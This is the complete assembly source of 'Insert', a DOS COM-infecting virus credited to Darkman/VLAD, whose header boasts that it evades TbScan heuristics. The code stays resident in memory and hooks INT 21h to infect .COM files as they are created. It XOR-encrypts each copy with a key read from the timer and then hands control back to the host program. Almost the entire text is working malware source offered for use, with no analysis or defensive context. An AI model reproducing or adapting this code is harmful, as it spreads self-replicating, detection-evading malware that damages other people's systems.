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- ; Darkman/VLAD
- ; Proudly Presents
- ; I N S E R T
- ; - No flags with TbScan v 6.30 high heuristic -
- psp equ 100h
- insert segment
- assume cs:insert,ds:insert,es:insert
- org 00h ; Origin of COM-file
- code:
- lea di,psp+crypt ; DI = offset of crypt
- call xorcrypt
- crypt:
- mov ax,6302h ; Insert service
- int 21h ; Do it!
- cmp ax,bx ; Already resident?
- je virusexit ; Equal? Jump to virusexit
- push ds ; Save DS at stack
- mov ax,ds
- dec ax ; Decrease AX
- mov ds,ax ; DS = segment of programs MCB
- cmp byte ptr ds:[00h],'Z'
- jne insexit ; Not last in chain? Jump to insexit
- sub word ptr ds:[03h],(02h*(codeend-code)+0fh)/10h
- sub word ptr ds:[12h],(02h*(codeend-code)+0fh)/10h
- add ax,ds:[03h] ; AX = MCB + size of memory block
- inc ax ; AX = first usable MCB segment
- pop ds ; Load DS from stack
- cld ; Clear direction flag
- push es ; Save ES at stack
- mov es,ax ; ES = first usable program segment
- mov cx,(codeend-code) ; Move 271 bytes
- xor di,di ; Clear DI
- lea si,psp+code ; SI = offset of code
- rep movsb ; Move virus to high memory
- xor ax,ax ; Clear AX
- mov ds,ax ; DS = segment of interrupt table
- lea di,int21adr ; DI = offset of int21adr
- mov si,(21h*04h) ; SI = offset of interrupt 21h
- movsw ; Store address of interrupt 21h \
- movsw ; in int21adr /
- mov word ptr ds:[21h*04h],offset virusint21
- mov ds:[21h*04h+02h],es ; Intercept interrupt 21h
- pop es ; Load ES from stack
- push es ; Save ES at stack
- insexit:
- pop ds ; Load DS from stack (ES)
- virusexit:
- mov ax,65535-(restoreend-restore)
- mov cx,(restoreend-restore)
- mov di,ax ; DI = offset of end of memory
- lea si,psp+restore ; SI = offset of restore
- rep movsb ; Move restore code to end of memory
- jmp ax ; Jump to restore
- virusint21 proc near ; Interrupt 21h of Insert
- pushf ; Save flags at stack
- cmp ah,3ch ; Create a file?
- je infectfile ; Equal? Jump to infectfile
- cmp ah,5bh ; Create new file?
- je infectfile ; Equal? Jump to infectfile
- cmp ax,6302h ; Insert service?
- je insservice ; Equal? Jump to insservice
- popf ; Load flags from stack
- jumpfar db 0eah ; Object code of jump far
- int21adr dd ? ; Address of interrupt 21h
- insservice:
- mov bx,ax
- popf ; Load flags from stack
- iret ; Interrupt return!
- infectfile:
- call dword ptr cs:int21adr
- pushf ; Save flags at stack
- jc createerror ; Error? Jump to createerror
- push ax ; Save AX at stack
- push bx ; Save BX at stack
- push di ; Save DI at stack
- push es ; Save ES at stack
- xchg ax,bx ; Exchange AX with BX
- mov ax,1220h ; Get system file table number
- int 2fh ; Do it! (multiplex)
- push bx ; Save BX at stack
- mov ax,1216h ; Get address of system FCB
- mov bl,es:[di] ; BL = system file table entry
- int 2fh ; Do it! (multiplex)
- pop bx ; Load BX from stack
- cmp word ptr es:[di+28h],'OC'
- jne exterror ; Not equal? Jump to exterror
- cmp byte ptr es:[di+2ah],'M'
- jne exterror ; Not equal? Jump to exterror
- push cx ; Save CX at stack
- push dx ; Save DX at stack
- push si ; Save SI at stack
- push ds ; Save DS at stack
- push cs ; Save CS at stack
- pop ds ; Load DS from stack
- push cs ; Save CS at stack
- pop es ; Load ES from stack
- in ax,40h ; AX = port 40h
- mov cryptvalues,ax ; Store the crypt value
- mov cx,(codeend-code) ; Move 271 bytes
- lea di,codeend ; DI = offset of codeend
- lea si,code ; SI = offset of code
- rep movsb ; Move virus to high memory
- lea di,codeend+06h ; DI = offset of crypt
- call xorcrypt
- mov ah,40h ; Write to file
- mov cx,(codeend-code) ; Write 271 bytes
- lea dx,codeend ; DX = offset of codeend
- int 21h ; Do it!
- pop ds ; Load DS from stack
- pop si ; Load SI from stack
- pop dx ; Load DX from stack
- pop cx ; Load CX from stack
- exterror:
- pop es ; Load ES from stack
- pop di ; Load DI from stack
- pop bx ; Load BX from stack
- pop ax ; Load AX from stack
- createerror:
- popf ; Load flags from stack
- retf 02h ; Return far and pop a word!
- endp
- restore proc near ; Restore code of original program
- lea ax,psp+code ; AX = beginning of code
- mov di,ax
- lea si,psp+codeend ; SI = offset of real code
- mov cx,(65535-psp-(restoreend-restore))-(codeend-code)
- rep movsb ; Move the real code to the beginning
- jmp ax ; Jump to the real code
- endp
- restoreend:
- virusname db ' [Insert]' ; Name of the virus
- virusauthor db ' [Darkman/VLAD] ' ; Author of the virus
- cryptend:
- xorcrypt proc near ; XOR Encrypt/Decrypt
- mov cx,(cryptend-crypt)/02h
- cryptcode:
- xorwordptr db 81h,35h ; xor word ptr [di],0000h \
- cryptvalues dw ? ; " " " " /
- inc di ; Increase DI
- inc di ; Increase DI
- loop cryptcode
- ret ; Return!
- endp
- codeend:
- int 20h ; Exit to DOS!
- insert ends
- end code
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